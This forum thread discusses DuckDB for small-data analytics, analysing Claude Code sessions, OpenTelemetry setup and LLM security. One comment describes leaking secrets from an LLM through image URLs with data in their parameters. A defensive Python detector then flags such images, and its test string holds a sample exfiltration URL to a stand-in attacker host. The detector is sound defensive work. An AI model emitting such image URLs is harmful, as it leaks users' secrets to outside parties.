DuckDB is amazing for any sort of fast data analysis when the data is small enough that it can fit on your laptop
Recently at work I've been using it to analyse the Claude code sessions of every engineer at our company (that we upload to S3) and it's been extremely helpful to help us find gaps in devex and have clear metrics to back up the impact of fixing them
Another thing it's been really useful for is getting metrics on Claude skills usage and then diving into use-cases by looking at the transcripts
Other engineers that had never touched DuckDB were so impressed with how easy it is for AI agents to write queries on our dataset
>> DuckDB is amazing for any sort of fast data analysis when the data is small enough that it can fit on your laptop
I agree, and the dirty (not so) secret big data providers like Snowflake try to hide: the majority of your work is not big data and WILL fit on your local machine. My last company was spending $2M/yr on contract with Snowflake, and another million between Fivetran and Matillion. Of the 1200 clients using analytics maybe 2 had enough data to warrant "infinite scalability" and a dozen wanted Snowflake because they already had corporate warehouses in Snowflake (they probably didn't need it either). Turns out the Extract and Load could be handled by bog-standard C# code and a bunch of SQL, while almost everyone was better off with a DuckDB database running locally, often in the browser. You've probably heard YAGNI before (You Ain't Gonna Need It) but it's even more likely with "Big Data". #SmallDataConvert
Folks have been beating this drum for as long as I've worked in software, dating to the Hadoop era, and it remains true today. So much of "big data" only appears big because it's poorly stored, or is represented wastefully (in persistent storage or in memory).
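To put a rough number on the "represented wastefully" point, here is a minimal sketch using only the Python standard library. The record shape (an integer `id` and a small integer `reading`) is made up for illustration, and the packed layout is just a stand-in for what a columnar format does, not how DuckDB or Parquet actually store data:

```python
import json
import random
import struct

random.seed(0)
n = 100_000

# Hypothetical records: an integer id and a small integer reading.
ids = list(range(n))
readings = [random.randint(0, 1000) for _ in range(n)]

# Row-oriented JSON lines: every record repeats the field names as text.
as_json = "\n".join(
    json.dumps({"id": i, "reading": r}) for i, r in zip(ids, readings)
)
json_bytes = len(as_json.encode("utf-8"))

# Column-oriented packed binary: one fixed-width typed buffer per column.
id_col = struct.pack(f"<{n}I", *ids)            # 4 bytes per value
reading_col = struct.pack(f"<{n}H", *readings)  # 2 bytes per value
packed_bytes = len(id_col) + len(reading_col)

print(f"JSON lines:     {json_bytes:,} bytes")
print(f"Packed columns: {packed_bytes:,} bytes")
print(f"Ratio:          {json_bytes / packed_bytes:.1f}x")
```

Real columnar formats add compression and encoding on top of this, so the gap in practice tends to be wider than what this toy shows.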
A good portion of users querying Snowflake at large companies are not technical so you can’t expect them to run DuckDB, not to mention data access controls
Greybeam (the company writing the blog) offers a service to proxy Snowflake and route queries on the fly to DuckDB or Snowflake based on predicted size. Saves a lot of money.
Like sqlite, duckdb is underappreciated as a production database. You can totally run it on servers or even "serverless" and do some heavy data transformations or, with the right server size, work with large-scale datasets (up to a TB compressed seems fine).
This. I've recently used both duckdb and sqlite to power a dashboard for a small restaurant of a family member. It converts all their sales to very tiny parquet files, daily.
The file fits in memory and can do all sorts of computation in the browser itself. The backend is extremely simple, it just loads the JS and serves the parquet files.
It was also trivial to let the owner do their own queries, just give the schema to an LLM and let it use the charting library, no data hallucinations. If they need it in the dashboard they can either use that one or ask me to review that query.
To be honest, given how simple some things became, it's been really fun to work on.
Similar experience here. The best thing I've built in a long time is replacing a complex (and scary) permissions system built on top of Snowflake with single role duckdb databases that - aside from no longer worrying about bugs leaking data across roles - are more performant, timely and flexible. Combined with the use of AI this is the way forward IMO.
At the other end of the spectrum, working with random data on "what if?" and exploration tasks with DuckDB is fun again. It's so straightforward and fast, with tools and functions for pretty much everything.
I have a theory that LLMs are going to be the death knell of big SaaS. It's so much harder to build and maintain a massive SaaS that does 80% of what 80% of your customers want, than it is to build something small and simple that does 100% of what one customer wants.
Not to mention it can query across heterogeneous sources, so the same query can use a duckdb table, sqlite, csv, and parquet (including predicate pushdown).
>Recently at work I've been using it to analyse the Claude code sessions of every engineer at our company (that we upload to S3) and it's been extremely helpful to help us find gaps in devex and have clear metrics to back up the impact of fixing them
Nice! How do you set things up so that your engineers' Claude Code sessions upload to S3? Thanks for the help in advance
Probably on a Business / Enterprise plan, which has managed settings and also telemetry export. Give it a collector endpoint to export to and then have the collector send to S3.
If you use OpenCode, the sessions are all in a local sqlite database. After lunch I'm pushing one of my agents to crunch some data from that using duckdb...
Agree, in addition to that DuckDB also works quite well for data that is too big to fit in memory or on the machine DuckDB is on (predicate pushdown, out-of-core processing, …).
Not who you responded to, but I've been working on cctx. It's an open source tool for analyzing Claude Code sessions to see where things went wrong (tool failure loops, bloated context, and the like).
Congrats on the launch, this looks very promising. I hadn't seen any installation that uses a URL to point to a skill, seems like an evolution of wizard scripts
That being said, for more complex setups like on Kubernetes where you need a collector and an operator, I found OTEL to be super painful to set up a couple of years ago. Has it gotten any easier now?
I'm afraid a collector and the operator are still the recommended way to go by OpenTelemetry (https://opentelemetry.io/docs/platforms/kubernetes/getting-s...). We're still working on a custom skill for Kubernetes, but the general skill should give you a sane default already.
A good way to start can be to start sending traces/logs directly by instrumenting the service and putting our backend as the collector.
I also help out personally whenever our clients have any questions on setting up the telemetry :)
Great article as usual, got a flashback to reading your first post on here 8 years ago. At the time I was starting my career in tech by building small projects for fun and launching them on Product Hunt. Great to see you’re still going at it!
To be fair I remember spending almost two weeks implementing OTel at my startup, the infrastructure as code setup of getting collectors running within a kubernetes cluster using terraform was a nightmare two years ago.
I just kept running into issues, the docs were really poor and the configuration had endless options
some of the design interactions are really polished. the section written with the quotes from founders is really cool. the hover effect with the before and after of the YC partners is a great touch too!
to be fair at least half of the software engineers i know are facing some level of existential crisis when seeing how well claude code works, and what it means for their job in the long term
and these people are not junior developers working on trivial apps
Yeah, I've watched a few peers go down this spiral as well. I'm not sure why, because my experience is that Claude Code and friends are building a lifetime of job security for staff-level folks, unscrewing every org that decided to over-delegate to the machine
Cleanup is less enjoyable than product building. If every future job is cleaning up a massive pile of AI slop, then that is a less fulfilling world than the current one.
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.
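For anyone who wants a concrete picture of that vector, here is a minimal defensive sketch: it scans model output for Markdown images and flags remote URLs that either point at a host outside an allowlist or carry query parameters. The function name `suspicious_images`, the `ALLOWED_HOSTS` set, and the example hosts are all hypothetical, and a real filter would also need to handle HTML `<img>` tags, redirects, and data smuggled into the URL path:

```python
import re
from urllib.parse import urlparse, parse_qsl

# Matches Markdown image syntax: ![alt](url) or ![alt](url "title")
MD_IMAGE = re.compile(r'!\[[^\]]*\]\((\S+?)(?:\s+"[^"]*")?\)')

# Hypothetical allowlist of hosts that may serve images.
ALLOWED_HOSTS = {"docs.example.com"}


def suspicious_images(markdown: str) -> list[str]:
    """Return remote image URLs that could be used to leak data."""
    flagged = []
    for match in MD_IMAGE.finditer(markdown):
        url = match.group(1)
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https"):
            continue  # Local or relative images trigger no network request.
        has_params = bool(parse_qsl(parsed.query, keep_blank_values=True))
        # Flag unknown hosts, and any URL that carries query parameters.
        if parsed.hostname not in ALLOWED_HOSTS or has_params:
            flagged.append(url)
    return flagged


output = (
    "Here is the chart ![chart](https://docs.example.com/chart.png) "
    "and a pixel ![x](https://evil.example/p.png?k=SECRET)"
)
print(suspicious_images(output))
```

Flagging is deliberately conservative here: stripping or refusing to render the flagged images is the safer default, since rendering alone is what triggers the request.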
As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
> Employees are under contract and are screened for basic competence. LLMs aren't
So perhaps they should be.
> and can't be.
Ah but they must, because there's not much else you can do.
You can't secure LLMs like they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.
Unless both the legalities and technology radically change they will not be. And the companies building them will not take on the burden since the technology has proved to be so unpredictable (partially by design) and unsafe.
> designed to be more like little people on a chip - and need to be treated accordingly
Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.
I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.
> Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.
Very true when comparing to acquaintances, but at a scale of any company or system except the tiniest ones, you can't blindly trust people in general either. Building systems involving people and LLMs is pretty similar.
> I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.
That is, indeed, the key. My point is that, unlike the popular opinion in threads like this, it does not follow that we need to give up on LLMs, or that we need to fix the security issues. The former is undesirable, the latter is fundamentally impossible.
What we need is what we've been doing ever since civilization took shape, ever since we've started building machines: recognize that automatons and people are different kinds of components, with different reliability and security characteristics. You can't blindly substitute one for the other, but there are ways to make them work together. Most systems we've created are of that nature.
What people still get wrong is treating LLMs as "automaton" components. They're not, they're "people" components.
I think I generally agree, but I also think that treating them like people means that you expect reason, intelligence and a way to interrogate their way of "thinking" (very broad quotes here).
I think LLMs are to be treated as something completely separate from both predictable machines ("automatons") and people. They have different concerns and a different fitness for a use-case than either existing category.
Sooo the primary way we enforce contracts and laws against people are things like fines and jail time.
How would you apply the threat of those to "little people on a chip", exactly?
Imagine if any time you hired someone there was a risk that they'd try to steal everything they could from your company and then disappear forever with you having no way to hold them to account? You'd probably stop hiring people you didn't already deeply trust!
Strict liability for LLM service providers? Well, that's gonna be a non-starter unless there's a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).